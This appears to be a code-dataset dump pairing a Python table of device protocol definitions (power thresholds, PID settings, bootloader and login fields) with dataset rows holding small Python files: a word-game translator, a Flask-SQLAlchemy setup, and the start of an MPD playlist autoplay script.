func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10043] = func
func.guid = 10043
func.name = "MaxTotalCurrentWarning"
func.description = "Maximum total current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10044] = func
func.guid = 10044
func.name = "MaxTotalPowerOff"
func.description = "Maximum total power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10045] = func
func.guid = 10045
func.name = "MaxTotalPowerWarning"
func.description = "Maximum total power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10046] = func
func.guid = 10046
func.name = "MaxVoltageOff"
func.description = "Maximum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10047] = func
func.guid = 10047
func.name = "MaxVoltageWarning"
func.description = "Maximum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10048] = func
func.guid = 10048
func.name = "MinVoltageOff"
func.description = "Minimum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10049] = func
func.guid = 10049
func.name = "MinVoltageWarning"
func.description = "Minimum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10050] = func
func.guid = 10050
func.name = "ActiveEnergyReset"
func.description = "Active Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10051] = func
func.guid = 10051
func.name = "ApparentEnergyReset"
func.description = "Apparent Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10052] = func
func.guid = 10052
func.name = "MinTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10053] = func
func.guid = 10053
func.name = "MaxTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10054] = func
func.guid = 10054
func.name = "MinHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10055] = func
func.guid = 10055
func.name = "MaxHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10056] = func
func.guid = 10056
func.name = "LedStatus"
func.description = "To set Status of a led"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10057] = func
func.guid = 10057
func.name = "MatrixDisplayStatus"
func.description = "To set Status of a small matrix display"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10058] = func
func.guid = 10058
func.name = "Baudrate"
func.description = "To set baudrate for circular buffers"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10059] = func
func.guid = 10059
func.name = "P_PID"
func.description = "Proportional value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10060] = func
func.guid = 10060
func.name = "I_PID"
func.description = "Integral value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10061] = func
func.guid = 10061
func.name = "D_PID"
func.description = "Derivative value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10062] = func
func.guid = 10062
func.name = "WeightOfTempsensor"
func.description = "Gives the weight of a tempsensor to the input of a PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10063] = func
func.guid = 10063
func.name = "TargetTemp"
func.description = "Temperature to be set for PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10064] = func
func.guid = 10064
func.name = "MaximumPWM"
func.description = "Maximum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10065] = func
func.guid = 10065
func.name = "MinimumPWM"
func.description = "Minimum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10066] = func
func.guid = 10066
func.name = "Startuptime"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[40000] = func
func.guid = 40000
func.name = "JumpBoot"
func.description = "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge."
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40001] = func
func.guid = 40001
func.name = "GotoAddressmode"
func.description = "Addressing mode on/off"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40002] = func
func.guid = 40002
func.name = "GotoFactoryMode"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 16
func = Functions()
functions[40003] = func
func.guid = 40003
func.name = "DoSnapshot"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40004] = func
func.guid = 40004
func.name = "SampleChannelTime"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40005] = func
func.guid = 40005
func.name = "SampleChannelFFT"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40006] = func
func.guid = 40006
func.name = "FlushCallibData"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40007] = func
func.guid = 40007
func.name = "ModNum"
func.description = (
"To retrieve the number of modules connected to the device. The device itself is treated as module 0."
)
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40008] = func
func.guid = 40008
func.name = "ModInfo"
func.description = "To retrieve module information"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 26
func = Functions()
functions[40009] = func
func.guid = 40009
func.name = "ApplyIPSettings"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[50000] = func
func.guid = 50000
func.name = "Monitor"
func.description = "Get the monitor values"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50001] = func
func.guid = 50001
func.name = "Parameter"
func.description = "get all parameters"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50002] = func
func.guid = 50002
func.name = "CircularReadBuffer"
func.description = "Read from slave(application connected to rs232) to master or from master to application"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50003] = func
func.guid = 50003
func.name = "CircularWriteBuffer"
func.description = "Write of data from application to master or from master to slave(application connected to rs232)"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50004] = func
func.guid = 50004
func.name = "VoltageTimeSamples"
func.description = "Get the voltage samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50005] = func
func.guid = 50005
func.name = "CurrentTimeSamples"
func.description = "Get the current samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50006] = func
func.guid = 50006
func.name = "VoltageFreqSamples"
func.description = "Get the frequency analyse of the voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50007] = func
func.guid = 50007
func.name = "CurrentFreqSamples"
func.description = "Get the frequency analyse of the current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50008] = func
func.guid = 50008
func.name = "Eeprom"
func.description = "read or write eeprom data"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50009] = func
func.guid = 50009
func.name = "CallibrationValues"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 2
func = Functions()
functions[60000] = func
func.guid = 60000
func.name = "BootReadID"
func.description = "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60001] = func
func.guid = 60001
func.name = "BootJumpApp"
func.description = "Jump to the application, which starts at 0x4000. "
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40013] = func
func.guid = 40013
func.name = "UDPUser"
func.description = "User mode for UDP commands"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[60002] = func
func.guid = 60002
func.name = "BootXTEA"
func.description = "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60004] = func
func.guid = 60004
func.name = "BootErase"
func.description = "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60005] = func
func.guid = 60005
func.name = "BootPageRange"
func.description = (
"To get the number of pages of the application firmware memory. Only pages within this range can be erased."
)
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60010] = func
func.guid = 60010
func.name = "BootParameters"
func.description = "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40010] = func
func.guid = 40010
func.name = "DHCPReset"
func.description = "Reset DHCP"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[14] = func
func.guid = 14
func.name = "CurrentIP"
func.description = "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10067] = func
func.guid = 10067
func.name = "UserLogin"
func.description = "User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10068] = func
func.guid = 10068
func.name = "UserPassword"
func.description = "User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10069] = func
func.guid = 10069
func.name = "RestrictedUserLogin"
func.description = "Restricted User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10070] = func
func.guid = 10070
func.name = "RestrictedUserPassword"
func.description = "Restricted User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[60020] = func
func.guid = 60020
func.name = "BootAppFwID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[60021] = func
func.guid = 60021
func.name = "BootAppFwVersion"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[15] = func
func.guid = 15
func.name = "ApparentPower"
func.description = "Apparent power (this is the product of the current and the voltage)"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[16] = func
func.guid = 16
func.name = "PowerFactor"
func.description = "Powerfactor "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5010] = func
func.guid = 5010
func.name = "MinCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5011] = func
func.guid = 5011
func.name = "MinPower"
func.description = "Minimum port power occured since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5012] = func
func.guid = 5012
func.name = "MinPowerFactor"
func.description = "Minimum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5013] = func
func.guid = 5013
func.name = "MaxPowerFactor"
func.description = "Maximum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[17] = func
func.guid = 17
func.name = "TotalCurrent"
func.description = "Total current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[18] = func
func.guid = 18
func.name = "TotalRealPower"
func.description = "Total real power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[19] = func
func.guid = 19
func.name = "TotalApparentPower"
func.description = "Total apparent power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[20] = func
func.guid = 20
func.name = "TotalActiveEnergy"
func.description = "Total active energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[21] = func
func.guid = 21
func.name = "TotalApparentEnergy"
func.description = "Total apparent energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[22] = func
func.guid = 22
func.name = "TotalPowerFactor"
func.description = "Total power factor"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5014] = func
func.guid = 5014
func.name = "MinTotalCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5015] = func
func.guid = 5015
func.name = "MinTotalPower"
func.description = "Minimum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5016] = func
func.guid = 5016
func.name = "MinTotalPowerFactor"
func.description = "Minimum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5017] = func
func.guid = 5017
func.name = "MaxTotalPowerFactor"
func.description = "Maximum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10071] = func
func.guid = 10071
func.name = "ActiveTotalEnergyReset"
func.description = "Active Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10072] = func
func.guid = 10072
func.name = "ApparentTotalEnergyReset"
func.description = "Apparent Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| 961 | 30 | 153 |
132be6fea7c50a7a170c4f9aa91f51ac86857654 | 576 | py | Python | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | Python/pyworkout/strings/ex7.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
main()
| 20.571429 | 57 | 0.600694 | def ubbi_dubbi(
word: str
) -> str:
if len(word) == 0:
return word
vowels = {'a', 'e', 'i', 'o', 'u'}
translated_word_letters = []
for letter in word:
if letter.lower() in vowels:
prefix_to_add = 'ub'
translated_word_letters.append(prefix_to_add)
translated_word_letters.append(letter)
translated_word = ''.join(translated_word_letters)
return translated_word
def main():
word = input('Enter a word to translate: ')
print( ubbi_dubbi(word) )
if __name__ == '__main__':
main()
| 490 | 0 | 45 |
6fd23260949277ea92d89c10373634f8d0942f55 | 228 | py | Python | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 1 | 2020-06-21T04:08:26.000Z | 2020-06-21T04:08:26.000Z | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 13 | 2019-10-18T17:19:32.000Z | 2022-01-13T00:44:43.000Z | app_backend/databases/bearing.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 5 | 2019-02-07T03:15:16.000Z | 2021-09-04T14:06:28.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| 13.411765 | 39 | 0.732456 | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: bearing.py
@time: 2020-02-29 23:23
"""
from flask_sqlalchemy import SQLAlchemy
from app_backend import app
db_bearing = SQLAlchemy(app)
| 0 | 0 | 0 |
627df465bd86b19b5a94d072b880cccd05eaaae8 | 15,404 | py | Python | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | jukio/autoplay.py | tomow1/jukio | 5e3e8b06c1350d76c7d1a2e4cca7d9387687256e | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def addsong():
"""Adds a semi-random song to the playlist"""
rand = random.uniform(-0.5, 2)
cursor.execute("SELECT file, listened, added FROM songs "
"WHERE karma>? AND time < ? "
"AND NOT duplicate ORDER BY random() LIMIT 1;",
(rand, int(time.time()-(60*(flood_delay-trigger*3)))))
songdata = cursor.fetchone()
if not songdata:
updateone()
addsong()
else:
newkarma = karma(songdata[1], songdata[2]+1)
cursor.execute(
"UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
(songdata[2]+1, newkarma, int(time.time()), songdata[0],)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(songdata[0],)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
try:
client.add(songdata[0].encode(enc))
log("I Added " + songdata[0].encode(enc))
log("D A:" + str(songdata[2]+1) + ", K:" +
str(newkarma))
except mpd.CommandError:
log("W Couldn't add " + songdata[0].encode(enc))
update(songdata[0])
addsong()
allsongs = []
logLevel = "D"
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
"/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
try:
os.makedirs(datahome)
except os.error:
log("E Couldn't access nor create" + datahome + ", quitting", True)
exit(2)
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
password = host[:atloc]
host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
silent = False
s = getServSock()
try:
if len(sys.argv) <= 1 or sys.argv[1] != "start":
s.sendall(" ".join(sys.argv[1:]) + "\n")
data = s.recv(1024)
while data != "":
print data,
data = s.recv(1024)
except KeyboardInterrupt:
pass
s.shutdown(socket.SHUT_RDWR)
s.close()
# vim: tw=70 ts=2 sw=2
| 28.57885 | 91 | 0.573358 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
'''
